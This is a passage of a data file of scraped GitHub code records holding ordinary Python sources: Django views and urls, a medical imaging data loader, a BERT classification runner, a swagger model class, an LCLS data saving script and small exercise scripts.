]\n","repo_name":"shlenskov/foodgram-project-react","sub_path":"backend/foodgram/recipe/migrations/0003_add_tags.py","file_name":"0003_add_tags.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41074299525","text":"import os.path as osp\nimport numpy as np\nimport gc\nfrom skimage.measure import label, regionprops\n\nfrom ..io.imageio import ImageIO\nfrom .base import AugBase\n\n\nclass LoadPrepare(object):\n \"\"\"\n Not a class inherited from Stage. It's used to prepare the format of result.\n \"\"\"\n def __init__(self, debug=False):\n self.debug = debug\n\n def __repr__(self):\n return self.__class__.__name__ + f'(debug={self.debug})'\n\n def __call__(self, image_path, label_path='', **kwargs):\n result = {\n 'filename': osp.basename(image_path),\n 'image_path': image_path,\n 'label_path': label_path,\n 'img_fields': [],\n 'cls_fields': [],\n 'seg_fields': [],\n 'det_fields': [],\n 'history': [],\n 'time': [],\n '_debug_': self.debug\n }\n result.update(kwargs)\n return [result]\n \n\nclass LoadImageFromFile(AugBase):\n def __init__(self, to_float32=True):\n super().__init__()\n self.to_float32 = to_float32\n\n def __repr__(self):\n return self.__class__.__name__ + '(to_float32={})'.format(self.to_float32)\n \n def _forward(self, result):\n image_path = result['image_path']\n \n image, image_dim, image_spacing, image_origin = ImageIO.loadArray(image_path)\n if self.to_float32:\n image = image.astype(np.float32)\n result['img'] = image\n result['img_dim'] = image_dim\n result['img_shape'] = image.shape\n result['img_spacing'] = image_spacing\n result['img_origin'] = image_origin\n result['ori_shape'] = image.shape\n result['ori_spacing'] = image_spacing\n result['img_fields'].append('img')\n gc.collect()\n return result\n\n\nclass LoadAnnotations(AugBase):\n def __init__(self,\n with_cls=False,\n with_seg=False,\n with_det=False):\n super().__init__()\n self.with_cls = with_cls # for classification\n self.with_seg = with_seg # for segmentation\n self.with_det = with_det # for detection\n assert self.with_cls or with_seg or self.with_det\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(with_cls={}, with_seg={}, with_det={})'.format(self.with_cls, self.with_seg, self.with_det)\n return repr_str\n \n def _forward(self, result):\n if self.with_cls:\n self._load_cls(result)\n elif self.with_seg:\n self._load_seg(result)\n elif self.with_det:\n self._load_det(result)\n return result\n \n @staticmethod\n def _load_cls(result):\n \"\"\" class is 1 based number\"\"\"\n assert isinstance(result['label_path'], int), 'with label must contain a <int> label'\n result['gt_cls'] = result['label_path']\n result['cls_fields'].append('gt_cls')\n\n @staticmethod\n def _load_seg(result):\n \"\"\" seg is [1, d, h, w] \"\"\"\n label_path = result['label_path']\n assert osp.exists(label_path), 'label path must exist'\n seg, seg_dim, _, _ = ImageIO.loadArray(label_path)\n # assert result['img_dim'] == seg_dim, f\"img is {result['img_dim']}D while label is {seg_dim}D\"\n if np.max(seg) > 64: # it should be a cv image, such as jpg\n # the classes should less than 64\n # if 'ISIC2018' in label_path:\n # seg = (seg > 127.5).astype(np.float32)\n classes = np.unique(seg)\n assert len(classes) < 64, \"there maybe some error ?\"\n for tag, val in enumerate(classes):\n if tag == val:\n continue\n seg[seg == val] = tag\n\n result['gt_seg'] = seg.astype(np.int32)\n result['seg_shape'] = seg.shape\n result['seg_fields'].append('gt_seg')\n gc.collect()\n\n @staticmethod\n def _load_det(result):\n \"\"\" [n, (x,y,x,y, cls, score) | (x,y,z,x,y,z, cls, score)] \"\"\"\n dim = result['img_dim']\n pseudo_mask = np.zeros_like(result['img'][[0], ...])\n\n det = []\n for ann in result['label_path']:\n # ann['bbox']: (x,y,w,h) | (x,y,z,w,h,d)\n # ann['category_id']: int, 1 based\n det.append(ann['bbox'] + [ann['category_id'], 1.00]) # the last one is score\n # draw pseudo mask\n bbox = np.array(ann['bbox']).astype(np.float32)\n bbox[dim:] = bbox[:dim] + bbox[dim:]\n slices = list(map(slice, reversed(np.int32(bbox[:dim])), reversed(np.int32(bbox[dim:]))))\n slices = [slice(None)] + slices\n pseudo_mask[tuple(slices)] = ann['category_id']\n\n det = np.array(det).astype(np.float32)\n if len(det) != 0:\n # RoIAlign will contains start and stop elements, but width should not contain\n # for example: 0123456 start is 1, and stop is 4, width = 4 - 1 + 1 = 4\n # _####__\n det[:, dim: 2*dim] = det[:, :dim] + det[:, dim: 2*dim] - 1\n\n result['gt_det'] = det\n result['det_fields'].append('gt_det')\n result['pseudo_mask'] = pseudo_mask\n result['seg_shape'] = pseudo_mask.shape\n result['seg_fields'].append('pseudo_mask')\n\n\nclass LoadCoordinate(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n img_shape = result['img'].shape[1:]\n zz, yy, xx = np.meshgrid(\n np.linspace(-0.5, 0.5, img_shape[0]),\n np.linspace(-0.5, 0.5, img_shape[1]),\n np.linspace(-0.5, 0.5, img_shape[2]),\n indexing='ij')\n coord = np.stack([zz, yy, xx], 0).astype('float32')\n\n result['gt_coord'] = coord\n result['seg_fields'].append('gt_coord')\n return result\n\n\nclass LoadPseudoAsSeg(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n result['gt_seg'] = result.pop('pseudo_mask')\n result['seg_fields'].remove('pseudo_mask')\n result['seg_fields'].append('gt_seg')\n return result\n\n\nclass LoadSegAsImg(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n result['filename'] = osp.basename(result['label_path'])\n result['image_path'] = result['label_path']\n return result\n\n\nclass LoadWeights(AugBase):\n def __repr__(self):\n repr_str = self.__class__.__name__ + '()'\n return repr_str\n\n def _forward(self, result):\n dist, _, _, _ = ImageIO.loadArray(result['weight_path'])\n result['pixel_weight'] = dist\n return result\n\n\nclass LoadPredictions(AugBase):\n def __init__(self,\n with_cls=False,\n with_seg=False,\n with_det=False):\n super().__init__()\n self.with_cls = with_cls # for classification\n self.with_seg = with_seg # for segmentation\n self.with_det = with_det # for detection\n assert self.with_cls or with_seg or self.with_det\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(with_cls={}, with_seg={}, with_det={})'.format(self.with_cls, self.with_seg, self.with_det)\n return repr_str\n\n def _forward(self, result):\n if self.with_cls:\n self._load_cls(result)\n elif self.with_seg:\n self._load_seg(result)\n elif self.with_det:\n self._load_det(result)\n return result\n\n @staticmethod\n def _load_cls(result):\n result['pred_cls'] = -1\n result['cls_fields'].append('pred_cls')\n\n @staticmethod\n def _load_seg(result):\n result['pred_seg'] = np.zeros_like(result['img'][[0], ...])\n result['seg_fields'].append('pred_seg')\n\n @staticmethod\n def _load_det(result):\n dim = result['img_dim']\n result['pred_det'] = np.ones([500, 2 * dim + 2]) * -1.\n result['det_fields'].append('pred_det')\n\n\nclass WorldVoxelConversion(AugBase):\n def __init__(self, reverse=False):\n super(WorldVoxelConversion, self).__init__()\n self.reverse = reverse\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(reverse={})'.format(self.reverse)\n return repr_str\n\n @staticmethod\n def worldToVoxelCoord(worldCoord, origin, spacing):\n stretchedVoxelCoord = np.absolute(worldCoord - origin)\n voxelCoord = stretchedVoxelCoord / spacing\n return voxelCoord\n\n @staticmethod\n def VoxelToWorldCoord(voxelCoord, origin, spacing):\n stretchedVoxelCoord = voxelCoord * spacing\n worldCoord = stretchedVoxelCoord + origin\n return worldCoord\n\n def convert(self, result):\n np.concatenate(\n self.VoxelToWorldCoord(result['gt_det'][:, :3], result['img_spacing'], result['origin']),\n self.VoxelToWorldCoord(result['gt_det'][:, 3:], result['img_spacing'], result['origin']))\n\n def _forward(self, result: dict):\n pass\n # if self.reverse:\n # result['gt_det'] =\n\n\nclass Instance2BBoxConversion(AugBase):\n def __init__(self, instance='gt_seg'):\n super(Instance2BBoxConversion, self).__init__()\n self.always = True\n self.instance_key = instance\n self.reverse = False\n\n def __repr__(self):\n repr_str = self.__class__.__name__\n repr_str += '(instance_key={}, reverse={})'.format(self.instance_key, self.reverse)\n return repr_str\n\n def _forward(self, result: dict):\n assert self.instance_key in result['seg_fields'], f'{self.instance_key} not in seg_fields{result[\"seg_fields\"]}'\n self._init_params(result)\n\n foreground = result[self.instance_key][0].astype(int)\n labeled, num_obj = label(foreground, return_num=True)\n regions = regionprops(labeled, intensity_image=foreground)\n\n gt_det = []\n for region in regions:\n det = [i.start for i in region.slice][::-1] + [i.stop for i in region.slice][::-1]\n assert int(region.mean_intensity) == region.mean_intensity\n det += [int(region.mean_intensity), 1.0]\n gt_det.append(det)\n result['gt_det'] = np.array(gt_det)\n result['det_fields'].append('gt_det')\n return result\n\n","repo_name":"TimothyZero/MedVision","sub_path":"medvision/aug_cpu/loading.py","file_name":"loading.py","file_ext":"py","file_size_in_byte":10427,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"72203991787","text":"import turtle\nturtle.screensize(600,400,'white')\nturtle.pensize(1)\nturtle.pencolor('blue')\nangle = 0\nd = 1\nwhile angle!=360:\n turtle.seth(angle)\n for i in range(6):\n turtle.fd(d)\n turtle.left(60)\n angle += 12\n d += 2\nturtle.done()","repo_name":"Betristor/Python123","sub_path":"基础语法/turtle_fun2.py","file_name":"turtle_fun2.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38457338407","text":"import time\nimport torch\nimport numpy as np\nfrom importlib import import_module\nimport argparse\nimport utils\nimport train\n\nparser = argparse.ArgumentParser(description='Bruce-Bert-Text-Classification')\nparser.add_argument('--model', type=str, default='Bert', help='choose a model')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n # 数据集地址\n dataset = 'THUCNews'\n model_name = args.model\n x = import_module('models.' + model_name)\n config = x.Config(dataset)\n np.random.seed(1)\n # 保证每次运行结果一致\n torch.manual_seed(1)\n torch.cuda.manual_seed_all(1)\n torch.backends.cudnn.deterministic = True\n\n start_time = time.time()\n print('开始加载数据集')\n train_data, dev_data, test_data = utils.build_dataset(config)\n\n train_iter = utils.build_iterator(train_data, config)\n dev_iter = utils.build_iterator(dev_data, config)\n test_iter = utils.build_iterator(test_data, config)\n\n time_dif = utils.get_time_dif(start_time)\n print(\"准备数据的时间:\", time_dif)\n\n model = x.Model(config).to(config.device)\n train.train(config, model, train_iter, dev_iter, test_iter)\n","repo_name":"shehuan/Bert-Chinese-Text-Classification-PyTorch","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"35941222693","text":"from django.urls import path\nfrom .views import CustomerAddressUpdateView,CustomerAddressview, Customeraddressdeleteview, Customeralladdressview, load_states,load_cities\n\n\n\nurlpatterns=[\n path('customeradddelete/<int:delete>',Customeraddressdeleteview,name='customeraddressdelete'),\n # path('customeraddupdate/<int:update>',CustomerAddressupdateview,name='customeraddressupdate'),\n path('customeralladd/',Customeralladdressview,name='customeralladdress'),\n path('customeradd/',CustomerAddressview,name='customeraddress'),\n path('ajax/load-states/', load_states, name='ajax_load_states'),\n path('ajax/load-cities/', load_cities, name='ajax_load_cities'),\n path('customeraddupdate/<int:pk>',CustomerAddressUpdateView.as_view(),name='customeraddressupdate'),\n\n]\n\n\n","repo_name":"Shubham8184/Ecommerse_Django","sub_path":"EcommerseProject/CustomerProfile/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70965463789","text":"# coding: utf-8\n\n\"\"\"\n Gene Feature Enumeration Service\n\n The Gene Feature Enumeration (GFE) Submission service provides an API for converting raw sequence data to GFE. It provides both a RESTful API and a simple user interface for converting raw sequence data to GFE results. Sequences can be submitted one at a time or as a fasta file. This service uses <a href=\\\"https://github.com/nmdp-bioinformatics/service-feature\\\">nmdp-bioinformatics/service-feature</a> for encoding the raw sequence data and <a href=\\\"https://github.com/nmdp-bioinformatics/HSA\\\">nmdp-bioinformatics/HSA</a> for aligning the raw sequence data. The code is open source, and available on <a href=\\\"https://github.com/nmdp-bioinformatics/service-gfe-submission\\\">GitHub</a>.<br><br>Go to <a href=\\\"http://service-gfe-submission.readthedocs.io\\\">service-gfe-submission.readthedocs.io</a> for more information\n\n OpenAPI spec version: 1.0.7\n Contact: mhalagan@nmdp.org\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass Structure(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n def __init__(self, accession=None, rank=None, sequence=None, term=None):\n \"\"\"\n Structure - a model defined in Swagger\n\n :param dict swaggerTypes: The key is attribute name\n and the value is attribute type.\n :param dict attributeMap: The key is attribute name\n and the value is json key in definition.\n \"\"\"\n self.swagger_types = {\n 'accession': 'int',\n 'rank': 'int',\n 'sequence': 'str',\n 'term': 'str'\n }\n\n self.attribute_map = {\n 'accession': 'accession',\n 'rank': 'rank',\n 'sequence': 'sequence',\n 'term': 'term'\n }\n\n self._accession = accession\n self._rank = rank\n self._sequence = sequence\n self._term = term\n\n @property\n def accession(self):\n \"\"\"\n Gets the accession of this Structure.\n\n :return: The accession of this Structure.\n :rtype: int\n \"\"\"\n return self._accession\n\n @accession.setter\n def accession(self, accession):\n \"\"\"\n Sets the accession of this Structure.\n\n :param accession: The accession of this Structure.\n :type: int\n \"\"\"\n if accession is None:\n raise ValueError(\"Invalid value for `accession`, must not be `None`\")\n\n self._accession = accession\n\n @property\n def rank(self):\n \"\"\"\n Gets the rank of this Structure.\n\n :return: The rank of this Structure.\n :rtype: int\n \"\"\"\n return self._rank\n\n @rank.setter\n def rank(self, rank):\n \"\"\"\n Sets the rank of this Structure.\n\n :param rank: The rank of this Structure.\n :type: int\n \"\"\"\n if rank is None:\n raise ValueError(\"Invalid value for `rank`, must not be `None`\")\n\n self._rank = rank\n\n @property\n def sequence(self):\n \"\"\"\n Gets the sequence of this Structure.\n\n :return: The sequence of this Structure.\n :rtype: str\n \"\"\"\n return self._sequence\n\n @sequence.setter\n def sequence(self, sequence):\n \"\"\"\n Sets the sequence of this Structure.\n\n :param sequence: The sequence of this Structure.\n :type: str\n \"\"\"\n if sequence is None:\n raise ValueError(\"Invalid value for `sequence`, must not be `None`\")\n\n self._sequence = sequence\n\n @property\n def term(self):\n \"\"\"\n Gets the term of this Structure.\n\n :return: The term of this Structure.\n :rtype: str\n \"\"\"\n return self._term\n\n @term.setter\n def term(self, term):\n \"\"\"\n Sets the term of this Structure.\n\n :param term: The term of this Structure.\n :type: str\n \"\"\"\n if term is None:\n raise ValueError(\"Invalid value for `term`, must not be `None`\")\n\n self._term = term\n\n def to_dict(self):\n \"\"\"\n Returns the model properties as a dict\n \"\"\"\n result = {}\n\n for attr, _ in iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"\n Returns the string representation of the model\n \"\"\"\n return pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"\n For `print` and `pprint`\n \"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"\n Returns true if both objects are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"\n Returns true if both objects are not equal\n \"\"\"\n return not self == other\n","repo_name":"nmdp-bioinformatics/service-gfe-submission","sub_path":"client-python/swagger_client/models/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":5608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33892836206","text":"import sys\n\n# Modified from cpo example \n# https://github.com/chrisvam/psana_cpo/blob/master/hexanode_save_lcls1.py\n\nif len(sys.argv) == 1:\n print(\"Usage: \")\n print(\"source /reg/g/psdm/etc/psconda.sh\")\n print(\"python cspad_save_lcls1.py exp run detname n_events xtc_dir\")\n print(\"note: use n,m for run n to m, -1 for n_events for all events, leave out xtc_dir if using the experiment folder\")\n print(\"ex: python cspad_save_lcls1.py cxid9114 95,114 CxiDs2.0:Cspad.0 -1 /reg/d/psdm/cxi/cxid9114/demo/xtc\")\n exit()\n \nfrom psana import *\nimport numpy as np\nimport time\nexp = sys.argv[1]\nrun = sys.argv[2]\ndetname = sys.argv[3]\nn_events = int(sys.argv[4])\nxtc_dir = None\nif len(sys.argv) == 6:\n xtc_dir = sys.argv[5]\n\nif run.find(',') > -1:\n run_range = run.split(',')\n run_st, run_en = int(run_range[0]), int(run_range[1])+1\nelse:\n run_st = int(run)\n run_en = run_st + 1\n\nfor run in range(run_st, run_en):\n #hit_ts = np.loadtxt('hits_r%s.txt'%(str(run).zfill(4)), dtype=np.int)\n if xtc_dir:\n dsource = MPIDataSource('exp=%s:run=%s:dir=%s:smd'%(exp, str(run), xtc_dir))\n else:\n dsource = MPIDataSource('exp=%s:run=%s:smd'%(exp, str(run)))\n\n det = Detector(detname)\n epics = dsource.env().epicsStore()\n\n h5fname = \"%s_r%d.h5\"%(exp, run)\n smldata = dsource.small_data(h5fname, gather_interval=1)\n for nevt,evt in enumerate(dsource.events()):\n raw = det.raw(evt)\n if raw is None: continue \n photon_energy = epics.value('SIOC:SYS0:ML00:AO541')\n\n evt_id = evt.get(EventId)\n sec = evt_id.time()[0]\n nsec = evt_id.time()[1]\n timestamp = (sec << 32) | nsec\n \n t = evt_id.time()\n ms = \"%03d\" % (t[1]/1000000)\n tstring = int(time.strftime(\"%Y%m%d%H%M%S\", time.gmtime(t[0])) + ms)\n #found = np.searchsorted(hit_ts, tstring)\n #if hit_ts[found] == tstring:\n print(run, nevt, raw.shape, photon_energy, timestamp, tstring)\n smldata.event(raws=raw, photon_energies=photon_energy, timestamps=timestamp)\n\n if n_events > -1:\n if nevt>n_events: break\n \n smldata.save()\n smldata.close()\n print('Done with run %d'%run)\n \n","repo_name":"monarin/divelite","sub_path":"xtc1to2/cspad_save_lcls1.py","file_name":"cspad_save_lcls1.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13563750159","text":"\"\"\"\nKevin and Stuart want to play the 'The Minion Game'.\n\nGame Rules\n\nBoth players are given the same string, .\nBoth players have to make substrings using the letters of the string .\nStuart has to make words starting with consonants.\nKevin has to make words starting with vowels. \nThe game ends when both players have made all possible substrings. \n\nScoring\nA player gets +1 point for each occurrence of the substring in the string .\n\nFor Example:\nString = BANANA\nKevin's vowel beginning word = ANA\nHere, ANA occurs twice in BANANA. Hence, Kevin will get 2 Points. \n\nYour task is to determine the winner of the game and their score.\n\nInput Format\n\nA single line of input containing the string . \nNote: The string will contain only uppercase letters: .\n\nConstraints\n\n\n\nOutput Format\n\nPrint one line: the name of the winner and their score separated by a space.\n\nIf the game is a draw, print Draw.\n\nExample:\n>>> minion_game(\"BANANA\")\n'Stuart 12'\n\n\"\"\"\n\n\ndef minion_game(string):\n vowels = {\"A\", \"E\", \"I\", \"O\", \"U\"}\n len_word = len(string)\n Stuart = []\n Kevin = []\n\n for i in range(len_word):\n if string[i] not in vowels:\n for j in range(i + 1, len_word + 1):\n Stuart.append(string[i:j])\n for i in range(len_word):\n if string[i] in vowels:\n for j in range(i + 1, len_word + 1):\n Kevin.append(string[i:j])\n if len(Stuart) > len(Kevin):\n print(\"Stuart {}\".format(len(Stuart)))\n elif len(Stuart) == len(Kevin):\n print(\"Draw\")\n else:\n print(\"Kevin {}\".format(len(Kevin)))\n","repo_name":"kritikadusad/HackerRank","sub_path":"TheMinionGame.py","file_name":"TheMinionGame.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2299743848","text":"from django.shortcuts import render\nfrom django.shortcuts import redirect\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.models import User\nfrom apps.user.models import Profile, ProfileSubscriber\nfrom allauth.account.forms import LoginForm\nfrom apps.custom_auth.views import session_account_manager\nfrom apps.portal.models import Article, Category, Comment, ReplyComment, ArticleLike\nfrom django.db.models import Q\nfrom django.views.generic import View\nfrom apps.user.forms import subscribeForm\nfrom apps.portal.forms import commentForm\n\ndef get_User(username):\n UserObject = get_object_or_404(User, username=username)\n return UserObject\n\ndef get_Profile(username):\n user = get_User(username)\n if Profile.objects.filter(user=user).count() == 0:\n Profile.objects.create(user=user)\n \n ProfileObject = get_object_or_404(Profile, user=user)\n return ProfileObject\n\ndef get_Sub(username):\n Subscribers = ProfileSubscriber.objects.filter(author=get_Profile(username))\n return Subscribers\n\n\nclass Main(View):\n def get(self, request):\n title = 'IT-blog | Статьи, Уроки, Форум'\n template = 'portal/index.html'\n name = 'main'\n\n if request.user.is_authenticated:\n Subscribers = request.user.profile.get_subscribers()\n sub_str = request.user.profile.get_subscribers_str(Subscribers)\n\n else:\n sub_str = None\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n request.session['last_page'] = request.path\n\n context = { 'title': title, 'subscribers_value': sub_str, 'saved_account': saved_account, 'name': name }\n\n return render(request, template, context)\n\nclass Articles(View):\n def get(self, request):\n title = 'IT-blog | Статьи'\n name = 'post'\n template = 'portal/posts.html'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n sort = request.GET.get('sort')\n category_slug = request.GET.get('category', 'all')\n q = request.GET.get('q')\n\n if q:\n request.session['post_search'] = q\n if category_slug == 'all':\n articles = Article.objects.filter(\n Q(title__icontains=q)|\n Q(content__icontains=q)\n ).order_by('-timestamp')\n\n else:\n category = get_object_or_404(Category, slug=category_slug)\n articles = Article.objects.filter(\n Q(title__icontains=q, category=category)|\n Q(content__icontains=q, category=category)\n ).order_by('-timestamp')\n\n else:\n request.session['post_search'] = None\n if category_slug == 'all':\n articles = Article.objects.order_by('-timestamp')\n else:\n category = get_object_or_404(Category, slug=category_slug)\n articles = Article.objects.filter(category=category).order_by('-timestamp')\n\n if sort == 'asc':\n articles = articles.order_by('timestamp')\n\n try:\n last_search_q = request.session['post_search']\n except:\n last_search_q = None\n\n categories = Category.objects.all()\n\n return render(request, template, locals())\n\nclass Post(View):\n def get(self, request, pk=0):\n template = 'portal/post-view.html'\n name = 'post'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n is_liked = None\n is_sub = None\n\n if pk == 0:\n return redirect('/articles/')\n\n else:\n article = get_object_or_404(Article, pk=pk)\n\n if request.GET.get('action') == None:\n article.add_view()\n\n comments = Comment.objects.filter(article=article)\n replyComments = ReplyComment.objects.filter(article=article)\n\n comments_count = len(comments) + len(replyComments)\n\n comments_str = str(comments_count) + ' комментар'\n\n if comments_count == 1:\n comments_str += 'ий'\n\n elif comments_count > 0 and comments_count < 5:\n comments_str += 'ия'\n \n else:\n comments_str += 'иев'\n\n\n title = 'IT-blog | ' + article.title\n subs = article.author.get_subscribers()\n if subs is not None:\n subscribers_value = str(len(subs))\n else:\n subscribers_value = 0\n\n if request.user.is_authenticated:\n if ArticleLike.objects.filter(profile=request.user.profile, article=article).count() == 0:\n is_liked = False\n else:\n is_liked = True\n\n if ProfileSubscriber.objects.filter(user=request.user, author=article.author).count() == 0:\n is_sub = False\n else:\n is_sub = True\n\n if request.GET.get('action') == 'like':\n if is_liked == False:\n like = ArticleLike.objects.create(profile=request.user.profile, article=article)\n like.save()\n return redirect(article.get_absolute_url() + '#like')\n\n if request.GET.get('action') == 'unlike':\n if is_liked:\n like = ArticleLike.objects.get(profile=request.user.profile, article=article)\n like.delete()\n return redirect(article.get_absolute_url() + '#like')\n\n popular = Article.objects.order_by('-view')[:5]\n\n context = { 'article': article, 'comments_count': comments_count, 'comments_str': comments_str, 'comments': comments,\n 'replyComments': replyComments, 'is_liked': is_liked, 'is_sub': is_sub, title: 'title',\n 'subscribe_form': subscribeForm(), 'comment_form': commentForm(), 'subs': subs, 'subscribers_value': subscribers_value,\n 'popular': popular, 'saved_account': saved_account, 'loginForm': login_form, 'name': name }\n\n return render(request, template, context)\n\n def post(self, request, pk=0):\n\n article = get_object_or_404(Article, pk=pk)\n\n if 'write_comment' in request.POST:\n comment_form = commentForm(request.POST, request.FILES)\n\n if comment_form.is_valid():\n\n comment = comment_form.save(commit=False)\n\n comment.author = request.user\n comment.article = article\n comment.image = request.FILES['image']\n comment.content = request.POST['content']\n \n comment.save()\n \n return redirect(article.get_absolute_url() + '#comments')\n\n\n if 'subscribe' in request.POST:\n\n if ProfileSubscriber.objects.filter(user=request.user, author=article.author).count() == 0:\n is_sub = False\n else:\n is_sub = True\n\n subscribe_form = subscribeForm(request.POST)\n\n if is_sub == False:\n if subscribe_form.is_valid():\n subscribe_form.save(request, article.author)\n\n else:\n if subscribe_form.is_valid():\n subscribe_form.delete(request, article.author)\n\n return redirect(article.get_absolute_url() + '#profileCard')\n \n\nclass ArticleNew(View):\n def get(self, request):\n name = 'post'\n title = 'IT-blog | Уроки'\n template = 'portal/post-new.html'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n return render(request, template, locals())\n\nclass Lesson(View):\n def get(self, request, pk=0):\n name = 'lesson'\n title = 'IT-blog | Уроки'\n template = 'portal/lessons.html'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n login_form = LoginForm()\n request.session['last_page'] = request.path\n\n return render(request, template, locals())\n\nclass Top(View):\n def get(self, request):\n title = 'IT-blog | Топ #15'\n template = 'portal/top.html'\n name = 'top'\n\n request = session_account_manager(request)\n saved_account = request.session['saved_account']\n request.session['last_page'] = request.path\n\n top = Profile.objects.order_by('-sub_count')[:15]\n\n context = { 'title': title, 'saved_account': saved_account, 'top': top, 'name': name}\n return render(request, template, context)\n","repo_name":"Vilocer/it-portal","sub_path":"it_portal/apps/portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31021089044","text":"import pandas as pd\nimport pickle as pkl\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\n\ndata=pd.read_csv('Aripiprazol.csv')\n\n\n\nimport seaborn as sns\nsns.set(color_codes=True)\ng = sns.clustermap(data)\n\n\n\ndef read_model(name, feature_set):\n path='Models/'+name+feature_set+'.pkl'\n print(path)\n file=open(path, 'rb')\n model=pkl.load(file)\n return(model)\n\ndef create_feature_sets(data):\n predictors_6=['Brij', 'pH', 'acetonitril', 'Stretch Bend E', 'Non-1.4 VDW E', 'Rad', 'k']\n # Based on corellation\n predictors_15=['Brij', 'pH', 'acetonitril', 'Stretch Bend E', 'Non-1.4 VDW E', 'Rad', 'ShpC', 'H-don', 'H-acc', 'logP', 'pol', 'Ecd', 'Ed', 'Torsion E (Et)', 'Total Energy (E)', 'k']\n return ({'6_features':data[predictors_6], '15_features':data[predictors_15], '30_features':data})\n\ndef prepare_data(data):\n Y=data.iloc[:,-1] # label\n X=data.iloc[:,:-1] # input data\n scaler = StandardScaler()\n scaler.fit(X)\n X = scaler.transform(X)\n return (X, Y)\n\n\nnames=['ANN', 'GBT', 'K-NN', 'Lasso', 'LR', 'Random_Forest']\n\nfeature_sets=['_6_features', '_15_features', '_30_features']\n\ndatasets=create_feature_sets(data)\n\ndf=datasets['15_features']\nX,y=prepare_data(df)\n\ndf.head()\n\nmodel=read_model(names[1], feature_sets[1])\n\ny_hat=model.predict(X)\ny=np.array(y)\n\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(color_codes=True)\nnp.random.seed(sum(map(ord, \"regression\")))\n\nfrom sklearn.metrics import r2_score\n\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import LeaveOneOut\n\n#data['y_hat'] = cross_val_predict(model, X, y, cv=10)\n\n#data['diff']=np.abs(data.y_hat-data.k)\n\n'''\n\n'''\n\ndata['y_hat']=cross_val_predict(model, pd.DataFrame(X), y, cv=10)\ndata['diff']=abs(data.y_hat-data.k)\ndata['diff'].nlargest(3)\n\n\ndiff=np.column_stack((y,y_hat))\nabs_diff=np.abs(diff[:,0]-diff[:,1])\nnp.sort (abs_diff)\n\ndiff[:,0]-diff[:,1]\n\nabs_diff.arg_sort()[-3:][::-1]\n\nnp.argsort(abs_diff)\n\nabs_diff[73]\n\n[2,4,9]\n\ny[9]\ny[4]\ny[2]\n\nnp.concatenate(y,y_hat)\n\nnp.average(scores)\n\n\nfrom sklearn.ensemble import IsolationForest\n# fit the model\nrng = np.random.RandomState(42)\nclf = IsolationForest(random_state=rng)\nclf.fit(X)\ny_pred_train = clf.predict(X)\n\nX1=X[y_pred_train==1,:]\ny1=y[y_pred_train==1]\nlen(y1)\n\nfig, ax = plt.subplots()\nax.scatter(y, y_hat, edgecolors=(0, 0, 0))\nax.plot([y.min(), y.max()], [y.min(), y.max()], 'k-', 